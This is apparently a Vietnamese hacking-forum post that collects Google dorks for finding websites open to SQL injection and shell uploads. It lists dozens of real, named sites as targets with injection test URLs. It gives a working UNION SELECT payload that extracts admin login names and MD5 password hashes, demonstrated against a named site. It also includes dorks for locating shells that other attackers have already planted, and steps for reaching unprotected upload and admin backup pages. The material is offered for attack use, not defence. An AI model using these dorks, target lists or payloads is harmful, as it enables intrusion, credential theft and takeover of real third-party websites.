[Google Dork] SQl - Public 16/6

Google Dork : inurl:Default.aspx?PageID= 

Dang khai thác đối với aspx ở dork này tương tự như trong tut sau:

http://ducdung08clc.blogspot.com/2012/03/bai-3-sqli-khai-thac-oi-voi-aspx_17.html

Sau đây là 1 số site dính lỗi này:

http://www.macktrucks.com/default.aspx?pageid=40%27

http://ncm-society.org/default.aspx?PageID=1067%27

http://www.ariahealth.org/default.aspx?pageid=3330%27

http://ncm-society.org/default.aspx?PageID=1056%27

http://www.araiamericas.com/default.aspx?pageid=92%27

http://www.trexta.com/Default.aspx?pageID=17&CatID=38%27             

http://www.hurriyetdailynews.com/Default.aspx?pageID=428%27        

http://www.tapack.com/Default.aspx?pageid=115%27

www.sagiang.com.vn/Default.aspx?pageid=57'               

www.trexta.com/Default.aspx?pageID=18&CatID=186&PID=359'

http://www.bliss-stick.com/default.aspx?pageid=27%27            

http://nhadatanbien.com/default.aspx?pageid=projectdt&id=91%27

http://www.macktrucks.com/default.aspx?pageid=40%27

www.danangportvn.com/Default.aspx?PageId=183'

http://danangupi.vn/Default.aspx?PageId=125%27       

http://www.phanmemhoinhap.com/default.aspx?pageid=008'&display=gec.net

http://www.bmcgroup.com.vn/Default.aspx?PageId=363%27  

http://www.gentexcorp.com/default.aspx?pageid=2685%27

http://www.araiamericas.com/default.aspx?pageid=92%27

Tham khảo: http://1337day.com/exploits/18665

[bug] Wp - RevolutionTechnologies - SQLI

Dorck :   inurl:"/page.php?IDMenu=" revolutiontechnologies

http://www.kyokuten.net/page.php?IDMenu=967&IDLang=1%27

http://sdtrb-sofia.com/page.php?IDMenu=848&IDLang=1%27

http://sdtrb.revolutiontechnologies.net/page.php?IDMenu=845&IDLang=1%27

http://www.labsystems.bg/page.php?IDMenu=7%27

http://www.givelconsult.com/page.php?IDMenu=32%27

http://build.verum.bg/page.php?IDMenu=846&IDLang=2%27

http://www.spoon-golf.de/page.php?IDMenu=853&IDLang=4%27

http://revolutiontechnologies.eu/page.php?IDMenu=852&IDLang=2%27

[Bug] WebX (showsubpage.asp) SQLI

1. Google dork:   

inurl:"showsubpage.asp" "Powered By: WebX" 

2. Khai thác

-  Thêm Query 

null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1

  vào sau  http://www.victim.com/showsubpage.asp?subid=

- Nếu site dính bug này, nó sẽ hiện thi thông tin username và password được mã hóa MD5 của admin

Ví dụ: 

http://www.erdf.edu.in/showsubpage.asp?subid=null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1

-  Để giải mã pass bị mã hóa md5 đó, bạn có thể vứt đoạn mã đó lên google

Dork Tìm Kiếm Shell Trên Google

Với công cụ tìm kiếm google soleil có thể tìm thấy một số lượng shell lớn trên các site đã được hacker nào đó upload lên từ trước qua một số Dork như:

"Index of /sh3llZ"

"/sh3llZ/uploadshell/uploadshell.php"

intitle:index of/sh3llZ 

http://fab-shop.com/sh3llZ/c100/ 

Một Số Bug - Dork Upload Shell

I  -  TailoredWeb SheLL Upload Vulnerability 
 

           

     1-      Google Dork : 

    "inurl:simple-upload-53.php"

     2-    Chọn victim, sẽ có link như sau:

   http://www.site.com/simple-upload-53.php

OR

  http://www.site.com/path/simple-upload-53.php

Ví dụ:

  http://www.targetms.biz/simple-upload-53.php

Bug Dork Upload Shell

B1. Sử dụng dork sau vào google

allinurl:"index.php?Act=Merchants"

B2. Chọn 1 victim bất kỳ

http://www.vhmnetwork.com/index.php?Act=Merchants

B3. Thay đường path trên thành:

http://www.vhmnetwork.com/admin/backupstart.php